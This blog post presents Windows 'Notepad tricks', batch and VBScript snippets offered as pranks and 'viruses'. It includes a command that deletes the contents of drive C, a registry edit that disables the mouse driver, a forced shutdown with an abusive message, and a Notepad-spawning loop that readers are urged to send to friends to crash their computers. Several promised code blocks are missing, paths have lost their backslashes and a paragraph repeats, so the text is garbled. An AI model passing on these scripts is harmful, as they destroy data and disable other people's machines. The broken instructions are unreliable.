Notepad is a pre-installed program that installed in every version of
windows Computer. You can basically edit some text and important notes
from that program. Notepad save your files in default txt format in your
Windows PC Computer.
![]() |
Cool Notepad Tricks |
But here we give you some cool notepad tricks that
gonna make your boring Notepad Software into an interest-able program.
You can do many things from Notepad Program like creating programs,
modify system files, hack hardware, create a virus from notepad and many
more things. You can also give your computer the commands from notepad
program.
These Notepad Tricks works in all window versions like Windows 7,
Window 8 and Window 10. Here we post vbs notepad tricks and notepad
hacks for window 7, 8 and 10.
Methods for Opening Notepad Program in Windows PC
You can Notepad Text Editor from many ways but here we mention three quick fast way for opening Notepad Programs in Windows PC.
Method 1: Press Window + R button and type notepad, Now press Enter Button.
![]() |
Windows Search and Run |
Method 2: Press Window Button and search notepad.exe in the search bar. Select Notepad.exe program in the result.
1. Create CD Virus from Notepad (continuously pop out CD Drive)
Open Notepad and Write down below codes:
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as “cdvirus.vbs”.
If you accidentally open this file in your system, your cd pop-out
continuously. For closing this shit, you need to reboot your Windows
Computer.
If you accidentally open this file in your system, your cd pop-out
continuously. For closing this shit, you need to reboot your Windows
Computer.
2. Create Notepad Virus that Shutdown your Friend Computer with Message
Open Notepad and Type:-
Shutdown.exe -s -t 10
cls
msg * I don’t like you SHIT!
Save it as “shutdownvirus.bat”.
3. Open 100s of Notepad Tab in Your Computer for Crashing Friend Computer.
:top
START %SystemRoot%system32notepad.exe
GOTO top
Save it as “Unlimitednotepad.bat” and send it to your friends.
4. Make A Personal Log-Book or A Diary
Open Notepad and type:
Save it as “personaldiary.txt”.
Open it again.
When you open the file again you will see the current date and time
being inserted automatically after the LOG line. This will happen
automatically every time you reopen the notepad file.
5. Test Your Anti-Virus Program effectiveness
Test your antivirus is work or not from type this below code in your notepad.Copy the code give below in your notepad file:
Save it as “virus.exe” in your computer.
When you save that file in your Computer, you antivirus prompt and
say this is working virus. So you know antivirus is working properly in
your Window PC Computer.
6. Create Matrix Movie Computer Screen Effects in Your Computer
Open Notepad and Type:
Copy the below-mentioned text in your notepad file:
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
Save the file name as”matrix .bat ” in your Computer
7. Constantly Repeat Notepad Messages
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN
Save the file name but with “continue.bat” extension in your
computer. When you open this file in your computer, you see message line
by line without type anything.
8. Convert Text Into Audio from Notepad Program
Open Notepad and type
Dim message, sapi message=InputBox(“Enter your text for
conversion–Hacking-prophethacker”,”Hover pc Hacks Text-To-Audio
Converter”) Set sapi=CreateObject(“sapi.spvoice”) sapi.Speak message
Save this file as “textaudio.vbs” in your computer. Open the File and you hear the voice of your computer.
9. Format your Whole Hard Disk from Type Code in Notepad
This is really interesting things for you guys, you can format any Hard Drive from typing below code in computer.
Open notepad and type the below code in your Computer.
Save it as “Format.exe” file giving any name you desire.
That’s It ! Now just double click on the file (to open it) and your C: drive will be formatted !
This is just a little binary fun. Be Careful while using it.
10. Write Simple Undetectable Virus
Del C: *.* |y
And save that as bomb.bat in your Computer.
11. Disco Dancing Keyboard Light
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop
Save file as”disco.vbs ” in your computer and turns your keyboard light into disco light.
12. Disable the Mouse Controls in Computer
set key=”HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesMouclass”
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
Never try this trick in your Computer , because these trick disable your mouse controls in your computer.
Save this file as “disablemouse.bat” in your computer.
If You want best alternative of Notepad.exe in your computer. Download Notepad++ from official website in your computer. Trust me this is one of the best text editor for your window 7.
Form: prophethacker.com
Add comment